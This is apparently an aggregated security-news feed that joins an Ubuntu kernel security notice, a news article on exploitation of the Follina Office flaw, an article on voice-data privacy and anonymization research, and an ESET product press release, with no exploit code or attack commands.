Kyle Zeng discovered that the Network Queuing and Scheduling subsystem of  
the Linux kernel did not properly perform reference counting in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-29581)

Bing-Jhong Billy Jheng discovered that the io_uring subsystem in the Linux  
kernel contained in integer overflow. A local attacker could use this to  
cause a denial of service (system crash) or execute arbitrary code.  
(CVE-2022-1116)

Jann Horn discovered that the Linux kernel did not properly enforce seccomp  
restrictions in some situations. A local attacker could use this to bypass  
intended seccomp sandbox restrictions. (CVE-2022-30594)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  linux-image-5.4.0-1043-gkeop    5.4.0-1043.44  
  linux-image-5.4.0-1062-raspi    5.4.0-1062.70  
  linux-image-5.4.0-1073-oracle   5.4.0-1073.79  
  linux-image-gkeop               5.4.0.1043.46  
  linux-image-gkeop-5.4           5.4.0.1043.46  
  linux-image-oracle-lts-20.04    5.4.0.1073.73  
  linux-image-raspi               5.4.0.1062.96  
  linux-image-raspi2              5.4.0.1062.96

Ubuntu 18.04 LTS:  
  linux-image-5.4.0-1023-ibm      5.4.0-1023.25~18.04.1  
  linux-image-5.4.0-1043-gkeop    5.4.0-1043.44~18.04.1  
  linux-image-5.4.0-1062-raspi    5.4.0-1062.70~18.04.1  
  linux-image-5.4.0-1073-oracle   5.4.0-1073.79~18.04.1  
  linux-image-5.4.0-1075-gcp      5.4.0-1075.80~18.04.1  
  linux-image-gcp                 5.4.0.1075.58  
  linux-image-gkeop-5.4           5.4.0.1043.44~18.04.42  
  linux-image-ibm                 5.4.0.1023.39  
  linux-image-oracle              5.4.0.1073.79~18.04.52  
  linux-image-raspi-hwe-18.04     5.4.0.1062.63

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5442-2  
  https://ubuntu.com/security/notices/USN-5442-1  
  CVE-2022-1116, CVE-2022-29581, CVE-2022-30594

Package Information:  
  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1043.44  
  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1073.79  
  https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1062.70  
  https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1075.80~18.04.1  
  https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1043.44~18.04.1  
  https://launchpad.net/ubuntu/+source/linux-ibm-5.4/5.4.0-1023.25~18.04.1  
  https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1073.79~18.04.1  
  https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1062.70~18.04.1

Ubuntu Security Notice USN-5442-2

By Waqas
The Follina vulnerability was originally discovered after a malicious Microsoft Word document was uploaded on VirusTotal from a…
This is a post from HackRead.com Read the original post: Unofficial Micropatch for Follina Released as Chinese Hackers Exploit the 0-day

The Follina vulnerability was originally discovered after a malicious Microsoft Word document was uploaded on VirusTotal from a Belarus IP address.

On Thursday, May 30th, Hackread.com warned against the probability of a dangerous Microsoft zero-day flaw dubbed Follina being exploited in the wild. According to the latest reports, Chinese hackers have already started using it.

**What is Follina?**

Follina is a Microsoft Office flaw tracked as CVE-2022-30190. This vulnerability was discovered in May 2022 by researcher Kevin Beaumont in Microsoft Support Diagnostic Tool (MSDT).

According to the researcher, the exploit is activated when the victim opens a malicious document. The Protected View feature, as we know it, is designed to protect users from opening infected files. But, in the case of Follina, the file preview appears in Explorer, and Protected View is not triggered while the exploit is executed.

Threat actors can exploit this vulnerability to gain privilege escalation on a system and gain “god mode” access to the impacted system. Office Pro Plus, Office 2013, Office 2016, Office 2019, and Office 2021 were impacted by the flaw.

**Chinese APT Group Exploiting Follina**

It seems like this newly identified zero-day already has registered its first exploiters. It is suspected that the exploitation of Follina started in April 2022 with Russian and Indian users becoming the prime targets of interview requests, extortions, and other attacks.

The latest information is shared by Proofpoint, which claims that a threat actor identified as TA413 has exploited this flaw in its attacks targeting the Tibetan community. This actor was previously associated with China and had been attacking Tibetan entities for several years.

In one of its attacks in 2021, the group was caught using a malicious Firefox extension to phish Gmail credentials to spy on Tibetan activists. In the latest, the group used Central Tibetan Administration’s Women Empowerment Desk as a lure in the attacks involving Follina.

> “TA413 CN APT spotted ITW exploiting the Follina 0Day using URLs to deliver Zip Archives which contain Word Documents that use the technique.”
> 
> Proofpoint researchers on Twitter

Furthermore, the SANS Institute detected a document exploiting Follina to deliver malware. The file was written in Chinese, and its translation read: “Mobile phone room to receive orders – channel quotation – the lowest price on the whole network.”

Screenshot of a blog post titled “First Exploitation of Follina Seen in the Wild” on the SANS website published by Xavier Mertens, a freelance security consultant based in Belgium

MalwareHunterTeam has also discovered .docx files bearing Chinese filenames and installing infostealers through coolratxyz. The HTML file is full of junk for obfuscation purposes while it contains a script that downloads/executes the payload.

**Free Micropatches for the “Follina” by 0Patch**

0Patch, a Maribor, Slovenia-based IT security firm has issued free but unofficial micropatches addressing the Follina vulnerability. For more details on “How To” implement these micropatches head to the blog post published by 0Patch’s Mitja Kolsek.

Furthermore, the company has also released a YouTube video demonstrating how its micropatch detects and blocks attempts at exploiting the “Follina” 0day.

Meanwhile, CISA (Cybersecurity and Infrastructure Security Agency) is advising users to follow the “Workaround Guidance” for the Follina vulnerability issued by Microsoft on May 30, 2022.

**Microsoft Knew About the Flaw in April!**

Interestingly, Microsoft has been aware of the flaw since April, but a patch has not arrived. Reportedly, the tech giant was notified by a Shadow Chaser Group member. It is a team that focuses on APT inspection and detection.

Microsoft claims that the researcher who warned the organization about the flaw didn’t consider it a security-related problem. However, they had already seen a sample being exploited in the wild.

On May 27th, researcher Kevin Beaumont shared details of the vulnerability in his blog post after which the company assigned it a CVE and issued mitigation guidance until the arrival of official patches.

**More Microsoft Security News**

*   Hackers are using Microsoft Teams chat to spread malware
*   Malicious Office documents make up 43% of all malware downloads
*   Attackers bypass Microsoft security patch to drop Formbook malware
*   Google, Microsoft, and Oracle generated the most vulnerabilities in 2021
*   Google Drive accounted for 50% of malicious Office document downloads

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Unofficial Micropatch for Follina Released as Chinese Hackers Exploit the 0-day

Voice recognition—and data collection—have boomed in recent years. Researchers are figuring out how to protect your privacy.

Your voice reveals more about you than you realize. To the human ear, your voice can instantly give away your mood, for example—it’s easy to tell if you’re excited or upset. But machines can learn a lot more: inferring your age, gender, ethnicity, socio-economic status, health conditions, and beyond. Researchers have even been able to generate images of faces based on the information contained in individuals’ voice data.

As machines become better at understanding you through your voice, companies are cashing in. Voice recognition systems—from Siri and Alexa to those using your voice as your password—have proliferated in recent years as artificial intelligence and machine learning have unlocked the ability to understand not just what you are saying but who you are. Big Voice may be a $20 billion industry within a few years. And as the market grows, privacy-focused researchers are increasingly searching for ways to protect people from having their voice data used against them.

Vocal Threats

Both the words you say and how you say them can be used to identify you, says Emmanuel Vincent, a senior research scientist specializing in voice technologies at France’s National Institute for Research in Digital Science and Technology (Inria), but this is only the beginning. “You will also find other pieces of information about your emotions or your medical condition,” Vincent says.

“These additional pieces of information help build a more complete profile—then this would be used for all sorts of targeted advertisements,” Vincent says. As well as your voice data potentially feeding into the vast realm of data used to show you online ads, there’s also the risk that hackers could access the location where your voice data is stored and use it to impersonate you. A small number of these cloning incidents have already happened, proving the value your voice holds. Simple robocall scams have also recorded people saying “yes” to use the confirmation in payment scams.

Last year, TikTok changed its privacy policies and started collecting the voiceprints—a loose term for the data your voice contains—of people in the US alongside other biometric data, such as your faceprint. More broadly, call centers are using AI to analyze people’s “behavior and emotion” during phone calls and evaluate the “tone, pace, and pitch of every single word” to develop profiles of people and increase sales. “We’re almost in a situation where the systems to recognize who you are and link everything together exist, but the protection is not there—and it’s still quite far away from being readily usable,” says Henry Turner, who researched the security of voice systems at the University of Oxford.

Hidden Meaning

Your voice is produced through a complex process involving the lungs and your voice box, throat, nose, mouth, and sinuses. More than a hundred muscles are activated when you speak, says Rébecca Kleinberger, a voice researcher at the MIT Media Lab. “It's also very much the brain,” Kleinberger says. 

Researchers are experimenting with four ways to enhance privacy for your voice, says Natalia Tomashenko, a researcher at Avignon University, France, who has been studying voice and is the first author of a research paper on the results of a voice privacy engineering challenge. None of the methods are perfect, but they are being explored as possible ways to boost privacy in the infrastructure processing your voice data.

First is obfuscation, which tries to completely hide who the speaker is. Think of a Hollywood depiction of a hacker totally distorting their voice over a phone call as they explain a devilish plot or ransom (or hacktivist collective Anonymous’s promotional videos). Simple voice-changing hardware allows anyone to quickly change the sound of their voice. More advanced speech-to-text-to-speech systems can transcribe what you’re saying and then reverse the process and say it in a new voice.

Second, Tomashenko says, researchers are looking at distributed and federated learning—where your data doesn’t leave your device but machine learning models still learn to recognize speech by sharing their training with a bigger system. Another approach involves building encrypted infrastructure to protect people’s voices from snooping. However, most efforts are focused on voice anonymization.

Anonymization attempts to keep your voice sounding human while stripping out as much of the information that could be used to identify you as possible. Speech anonymization efforts currently involve two separate strands: anonymizing the content of what someone is saying by deleting or replacing any sensitive words in files before they are saved and anonymizing the voice itself. Most voice anonymization efforts at the moment involve passing someone’s voice through experimental software that will change some of the parameters in the voice signal to make it sound different. This can involve altering the pitch, replacing segments of speech with information from other voices, and synthesizing the final output.

Does anonymization technology work? Male and female voice clips that were anonymized as part of the Voice Privacy Challenge in 2020 definitely do sound different. They’re more robotic, sound slightly pained and could—to some listeners at least—be from a different person than the original voice clips. “I think it can already guarantee a much higher level of protection than doing nothing, which is the current status,” says Vincent, who has been able to reduce how easy it is to identify people in anonymization research. However, humans aren’t the only listeners. Rita Singh, an associate professor in Carnegie Mellon University’s Language Technologies Institute, says that total de-identification of the voice signal is not possible, as machines will always have the potential to make links between attributes and individuals, even connections that aren’t clear to humans. “Is the anonymization with respect to a human listener or is it with respect to a machine listener?” says Shri Narayanan, a professor of electrical and computer engineering at the University of Southern California.

“True anonymization is not possible without completely changing the voice,” Singh says. “When you completely change the voice, then it's not the same voice.” Despite this, it is still worth developing voice-privacy technology, Singh adds, as no privacy or security system is totally secure. Fingerprints and face identification systems on iPhones have been spoofed in the past, but overall, they’re still an effective method of protecting people’s privacy.

Bye, Alexa

Your voice is increasingly being used as a way to verify your identity. For example, a growing number of banks and other companies are analyzing your voiceprints, with your permission, to replace your password. There’s also the potential for voice analysis to detect illness before other signs are obvious. But the technology to clone or fake someone’s voice is advancing quickly.

If you have a few minutes of someone’s voice recorded, or in some instances a few seconds, it’s possible to recreate that voice using machine learning—_The Simpsons’_ voice actors could be replaced by deep fake voice clones, for instance. And commercial tools for recreating voices are readily available online. “There’s definitely more work in speaker identification and producing speech to text and text to speech than there is in protecting people from any of those technologies,” Turner says.

Many of the voice anonymization techniques being developed at the moment are still a long way from being used in the real world. When they are ready to be used it’s likely that companies will have to implement tools themselves, to protect their customers' privacy—there’s currently little individuals can do to protect their own voice. Avoiding calls with call centers or companies that use voice analysis, and not using voice assistants, could limit how much your voice is recorded and reduce possible attack opportunities.

But the biggest protections may come from legal cases and protections. Europe’s GDPR covers biometric data, including people’s voices, in its privacy protections. Guidelines say people should be told how their data is being used and provide consent if they’re being identified, and that some restrictions should be placed on personalization. Meanwhile, in the US, courts in Illinois— home to some of the strongest biometric laws in the country—are increasingly inspecting cases involving people’s voice data. McDonald’s, Amazon, and Google are all facing judicial scrutiny over how they use people’s voice data. The decisions in these cases could lay down new rules for the protection of people’s voices.

The Race to Hide Your Voice

SAN DIEGO, May 31, 2022 /PRNewswire/ -- ESET, a global leader in cybersecurity, has announced a new suite of products for the Telecommunications and Internet Service Provider (Telco and ISP) industry, with the aim of offering extensive protection to consumers. Cybercrime is a borderless problem and ESET telemetry shows that the volume of cyberattacks is increasing, with a trend toward attacks against smartphones. ESET's newly launched NetProtect suite ensures that service providers and their end users have the tools they need to combat these advanced and evolving mobile threats.

**About the new ESET NetProtect products  
**The new offering includes ESET NetProtect for Mobile and ESET NetProtect for Mobile Advanced, which offer security via mobile networks, and ESET NetProtect for Home Advanced, which helps secure fixed network connections. These solutions protect customer devices connected to Telco and ISP networks (fixed or mobile) against malicious web domains or domain categories such as malware, phishing and potentially unwanted content. With ESET NetProtect Advanced (fixed or mobile), parents also have full control of their children's filters through Web Content Filter. The management portal for end users allows them to manage the ESET NetProtect settings of their connected devices, manage their domain whitelists and blacklists, and generate security reports, giving users an insight into how ESET protects their devices as well as summary information about detected threats, blocked webpages and more.

Thanks to easy integration into Telco and ISP network services and existing activation processes, network-level solutions do not require any software installation on end user devices, and are compatible with both Android and iOS. The solutions are provided as a one-click service activation from the users' trusted internet provider and automatically provide protection to any connected device. Security tailored to customers' needs is ensured by offering robust local customer and partner support coverage along with comprehensive protection that is a step ahead of online threats via ESET's first access to a unique set of malware detected and pooled at a worldwide network of research and development centers.

"We are thrilled to launch this new suite of advanced cybersecurity products designed for service providers and their customers, which represents a critical threat vector for bad actors," said Brent McCarty, President of ESET North America. "At ESET, we always develop products with our customers in mind, and with our ESET NetProtect offering we have created an easy-to-use and elegant solution not only for the industry leaders in the Telco and ISP sector, but for the consumers who are the actual end users of our products."

For more than 30 years, ESET has invested heavily in multiple layers of proprietary technology that prevent breaches of its customers' endpoints and systems, by both known and never-before-seen threats. These products are informed by world-class threat analysis and expertise from the company's global research team. With a presence in over 200 countries worldwide and 13 research and development centers around the world, ESET offers its over 400,000 business customers peace of mind that their interests are protected at all times. ESET also helps protect the Google Play store and is trusted by millions of consumers around the world. To read more about the new offering for Telcos and ISPs or to contact the ESET team for more information, please click here.

**About ESET  
**For more than 30 years, ESET® has been providing enterprises across the globe with industry-leading IT security software and services, including endpoint detection and response, encryption and authentication, and comprehensive security services packages. With high-performing, easy-to-use solutions that cater to businesses of all sizes, ESET protects customers from increasingly sophisticated digital threats in an ever-evolving landscape. ESET delivers to the enterprise market the people, expertise, and cutting-edge technology required to keep businesses safe and running without interruption. For more information, visit www.eset.com or follow us on LinkedIn, Facebook, and Twitter.

SOURCE ESET

Tag

#google